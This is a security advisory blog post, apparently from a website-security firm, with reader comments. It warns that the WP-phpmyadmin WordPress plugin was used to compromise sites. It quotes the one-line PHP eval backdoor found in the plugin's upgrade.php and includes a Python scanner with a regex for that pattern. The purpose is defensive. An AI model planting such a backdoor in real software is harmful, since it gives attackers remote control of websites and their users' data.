If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it and we are investigating what is going on.
On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file:
<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>
This is not part of the plugin, and should be removed immediately!
The code snippet above is a backdoor: it evaluates whatever PHP code is sent in the asc request parameter, which gives an attacker remote access to any site where it is installed.
We also noticed that the plugin was removed from the WordPress plugin repository (originally here: wordpress.org/extend/plugins/wp-phpmyadmin/ ) and is no longer maintained (last update in 2007). Since it is no longer being updated, you shouldn’t be using it anymore.
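To check the rest of a site for the same pattern, the following Python scanner (an added example, not part of the original post or the plugin) walks a directory tree and flags any PHP line where eval() or assert() is fed from a request superglobal, directly or through wrappers such as stripslashes(). The function names, the regular expression and the constructed sample tree are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

# eval()/assert() whose argument reaches a request superglobal, optionally
# through nested wrappers such as stripslashes() or base64_decode().
BACKDOOR_RE = re.compile(
    rb"\b(?:eval|assert)\s*\(\s*(?:@?\w+\s*\(\s*)*\$_(?:REQUEST|GET|POST|COOKIE)\b",
    re.IGNORECASE,
)

def scan_php_tree(root):
    """Return sorted (relative_path, line_number, line) hits under root."""
    root = Path(root)
    hits = []
    for path in root.rglob("*.php"):
        try:
            data = path.read_bytes()
        except OSError:
            continue  # unreadable file: skip it, keep scanning
        for lineno, line in enumerate(data.splitlines(), 1):
            if BACKDOOR_RE.search(line):
                text = line.strip().decode("utf-8", "replace")
                hits.append((path.relative_to(root).as_posix(), lineno, text))
    return sorted(hits)

def demo():
    """Scan a constructed sample tree: one infected file, one clean file."""
    with tempfile.TemporaryDirectory() as tmp:
        plugin = Path(tmp) / "wp-phpmyadmin" / "phpmyadmin"
        plugin.mkdir(parents=True)
        # The line reported in the post, written to a throwaway file.
        (plugin / "upgrade.php").write_text(
            '<?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?>\n'
        )
        # Constructed benign file that reads request input without eval().
        (plugin / "index.php").write_text(
            '<?php echo htmlspecialchars($_GET["page"]); ?>\n'
        )
        return scan_php_tree(tmp)

if __name__ == "__main__":
    for rel, lineno, text in demo():
        print(f"{rel}:{lineno}: {text}")
```

A match is a reason to inspect the file by hand; an empty result does not prove a site is clean, since obfuscated variants (split strings, variable function names) will not match this expression.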
EDIT: We had an opportunity to catch up with Andrew Nacin, a WordPress Core Member who stated:
The reason it had been pulled from the directory was that it had phpMyAdmin setup files in it, which can expose server information.
So the plugin wasn’t removed because of any security issue. However, because of the recent weird activity and the fact that it is not maintained, we recommend deleting it as soon as possible.
If you’re seeing anything out of the ordinary, please let us know. If we find anything else, we will update the post.
If you are not sure if your site got hacked, you can scan it here: http://sitecheck.sucuri.net.
WP Greet Box was also removed recently (probably for security reasons).
What about the plugin Portable phpMyAdmin?
That plugin fixed the security problem: http://wordpress.org/extend/plugins/portable-phpmyadmin/changelog/
Hi Otto, are you referring to Portable phpMyAdmin?
The link you posted is redirecting to the plugin directory home page.
Looks like the plugin is back in action.
We haven’t seen any security issues with that plugin, Eric.
The thing to consider is that you’re giving direct access in the WordPress dashboard to modify the database. This is a huge risk when you consider users that aren’t experienced with this type of interaction. If it needs to be used in a production environment, it is highly recommended that the proper access control be applied, and that processes be implemented around the use of the functionality.
Hope this helps!
Thanks for the info.
I’ve had a nightmare over the last 24 hours as ALL my sites were compromised and malicious code injected into the index.php files.
I’ve now removed the phpmyadmin plugin (which had the corrupted code in the update file as you say) and all seems to be ok for the moment. Fingers crossed it stays that way.
My question is…
Could the hacker access and inject malicious code on all my sites (all on the same shared hosting server) even if the plugin was only installed on one of the domains?
I ask because I want to know if this is the only plugin causing me woe or whether there are more I need to act on.
First off, I completely agree that having a phpadmin plugin in the WP Dashboard is a huge risk on so many different levels. 😉 With that said, have you looked at or tested the WordPress Adminer plugin? The coding looks really solid and minus some base64 encoded images it looks really solid. Thanks.
Hi, I am very pleased with the plugin. It does exactly what I wanted. Thanks for sharing!
Now this plugin is removed from WordPress because it had malicious code.
My website was hacked after installing this and it said “hacked by nolov3” and my website was gone.
Doesn’t seem to be such a reliable claim. PhPMyAdmin is nowhere a low-quality malware, but instead a widely-used and quite nice tool. This article here seems to be indicating that the authors of that software deliberately wanted to do some backdoor things. This I highly doubt. http://www.phpmyadmin.net/home_page/security/ Hope more experienced people would provide some more knowledge on it.
Did you read the article? It is talking about WordPress plugin that packaged phpMyAdmin, and was insecure. They aren’t talking about the actual phpMyAdmin tool as being insecure, just the plugin.
Congratulations on the post. I was looking for an article like this.